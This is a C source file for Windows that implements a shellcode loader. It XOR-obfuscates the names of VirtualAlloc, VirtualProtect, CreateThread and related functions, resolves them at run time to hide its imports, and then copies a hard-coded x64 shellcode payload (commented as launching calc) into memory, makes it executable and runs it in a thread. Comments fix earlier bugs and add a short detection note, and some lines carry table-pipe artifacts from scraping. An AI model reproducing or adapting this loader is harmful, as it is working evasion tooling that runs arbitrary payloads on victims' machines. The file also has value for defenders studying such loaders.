| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include "helpers.h" | |
| #pragma comment(linker, "/entry:WinMain") | |
/*
 * Function-pointer types for the KERNEL32 exports that WinMain resolves at
 * run time through hlpGetProcAddress (helpers.h, not visible in this file);
 * each mirrors the Win32 signature of the export of the same name so the
 * resolved address can be called without a static import.
 *
 * CloseHandle_t is declared but never used here: the thread handle that
 * WinMain obtains from CreateThread is not closed before the function
 * returns.
 */
typedef DWORD (WINAPI * WaitForSingleObject_t)(
    HANDLE hHandle,
    DWORD dwMilliseconds
);
typedef BOOL (WINAPI * CloseHandle_t)(
    HANDLE hObject
);
typedef LPVOID(WINAPI *VirtualAlloc_t)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD flAllocationType,
    DWORD flProtect
);
typedef void(WINAPI *RtlMoveMemory_t)(
    void *Destination,
    const void *Source,
    SIZE_T Length
);
typedef BOOL(WINAPI *VirtualProtect_t)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD flNewProtect,
    PDWORD lpflOldProtect
);
typedef HANDLE(WINAPI *CreateThread_t)(
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    SIZE_T dwStackSize,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    DWORD dwCreationFlags,
    LPDWORD lpThreadId
);
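/*
 * Repeating-key XOR of data[0..data_len) in place.
 *
 * Key-stream semantics are kept exactly as the original wrote them: the key
 * index wraps as soon as it reaches key_len - 1, so the LAST byte of `key`
 * is never used. Every caller in this file passes sizeof(key) on a string
 * literal, so the excluded byte is the NUL terminator and the effective
 * key is the literal's characters (12 bytes for "hellohackers").
 *
 * Fixes relative to the original:
 *   - the loop counter and key index were `int` while the bounds are
 *     size_t (signed/unsigned comparison, and undefined behaviour once
 *     data_len exceeds INT_MAX); both are size_t now.
 *   - key_len <= 1 used to step off the end of `key` (the wrap point is
 *     0 or wraps around), so it now leaves `data` untouched: there is no
 *     usable key byte in that case.
 *
 * data     buffer transformed in place; may be NULL only when data_len == 0
 * data_len number of bytes to transform
 * key      key bytes; only the first key_len - 1 are ever read
 * key_len  size of `key` including the excluded trailing byte
 */
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
    if (key_len <= 1 || data_len == 0) {
        return;
    }
    size_t period = key_len - 1;   /* last key byte is deliberately skipped */
    size_t j = 0;
    for (size_t i = 0; i < data_len; i++) {
        data[i] ^= key[j];
        if (++j == period) {
            j = 0;
        }
    }
}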
| //int main(void) { | |
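/*
 * Program entry point (the linker is pointed at it by /entry:WinMain above).
 *
 * Flow, unchanged from the original:
 *   1. decode five XOR-obfuscated KERNEL32 export names in place;
 *   2. resolve each through hlpGetModuleHandle / hlpGetProcAddress
 *      (declared in helpers.h, not visible in this file);
 *   3. allocate a private PAGE_READWRITE region and copy `payload` into it;
 *   4. change the region to PAGE_EXECUTE_READ, start a thread at its base
 *      and wait for that thread to finish.
 *
 * Defects fixed here, none of which alter the flow above:
 *   - payload_len was hard-coded to 350 while the initializer holds 276
 *     bytes, so the copy read 74 bytes past the end of `payload` on the
 *     stack; sizeof payload is used for the allocation, copy and protect.
 *   - sWaitForSingleObject lacked the trailing 0x00 the other four tables
 *     carry: "sizeof - 1" left its last byte undecoded and the lookup
 *     received an unterminated string. The terminator is appended so all
 *     19 characters are decoded and the name is NUL-terminated.
 *   - every resolved pointer, the allocation and the thread handle are
 *     checked for NULL before use instead of being called blindly.
 *
 * The XOR helper skips the final key byte, so passing sizeof(key) (13,
 * including the NUL) yields the 12-character key "hellohackers".
 *
 * The standard WinMain parameters are unused.
 * Returns 0 when the thread ran to completion, 1 when any step failed.
 *
 * Detection note: the observable host behaviour is a private RW allocation,
 * a write into it, an RW->RX protection change on the same region, and a
 * thread whose start address lies inside that region. The thread handle is
 * never closed; the function returns right after the wait, so the handle is
 * released only at process exit.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow) {
    (void)hInstance;
    (void)hPrevInstance;
    (void)lpCmdLine;
    (void)nCmdShow;

    char key[] = "hellohackers";
    /* Each table is the export name XOR'ed with `key`, plus a 0x00 that
     * "sizeof - 1" excludes from decoding and that terminates the result. */
    char sVirtualAlloc[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x22,0x07,0x09,0x1d,0x10,0x00 };
    char sRtlMoveMemory[] = {0x3a,0x11,0x00,0x21,0x00,0x1e,0x04,0x2e,0x0e,0x08,0x1d,0x01,0x11,0x00 };
    char sVirtualProtect[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x33,0x19,0x0a,0x06,0x16,0x0b,0x11,0x00 };
    char sCreateThread[] = {0x2b,0x17,0x09,0x0d,0x1b,0x0d,0x35,0x0b,0x19,0x00,0x13,0x17,0x00 };
    /* Terminator added: the original 19-byte table had none. */
    char sWaitForSingleObject[] = {0x3f,0x04,0x05,0x18,0x29,0x07,0x13,0x30,0x02,0x0b,0x15,0x1f,0x0d,0x2a,0x0e,0x06,0x0a,0x0b,0x15,0x00 };
    unsigned char payload[] = {
        // shellcode to open calc
        0xfc,0x48,0x83,0xe4,0xf0,0xe8,
        0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,
        0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
        0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,
        0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,
        0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,
        0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
        0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,
        0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
        0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
        0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,
        0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
        0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,
        0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,
        0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,
        0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,
        0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
        0x63,0x2e,0x65,0x78,0x65,0x00};
    /* Derived from the array, not a hand-maintained constant. */
    size_t payload_len = sizeof payload;

    XOR(sVirtualAlloc, sizeof(sVirtualAlloc) - 1, key, sizeof(key));
    XOR(sRtlMoveMemory, sizeof(sRtlMoveMemory) - 1, key, sizeof(key));
    XOR(sVirtualProtect, sizeof(sVirtualProtect) - 1, key, sizeof(key));
    XOR(sCreateThread, sizeof(sCreateThread) - 1, key, sizeof(key));
    XOR(sWaitForSingleObject, sizeof(sWaitForSingleObject) - 1, key, sizeof(key));

    WaitForSingleObject_t pWaitForSingleObject = (WaitForSingleObject_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sWaitForSingleObject);
    VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sVirtualAlloc);
    RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sRtlMoveMemory);
    VirtualProtect_t pVirtualProtect = (VirtualProtect_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sVirtualProtect);
    CreateThread_t pCreateThread = (CreateThread_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sCreateThread);
    /* A failed lookup used to become a call through NULL. */
    if (pWaitForSingleObject == NULL || pVirtualAlloc == NULL ||
        pRtlMoveMemory == NULL || pVirtualProtect == NULL ||
        pCreateThread == NULL) {
        return 1;
    }

    LPVOID exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (exec_mem == NULL) {
        return 1;
    }
    // Copy payload to new buffer
    pRtlMoveMemory(exec_mem, payload, payload_len);
    // Make new buffer as executable
    DWORD oldprotect = 0;
    BOOL rv = pVirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    if (rv == 0) {
        return 1;
    }
    // If all good, run the payload
    HANDLE th = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
    if (th == NULL) {
        return 1;
    }
    pWaitForSingleObject(th, INFINITE);
    return 0;
}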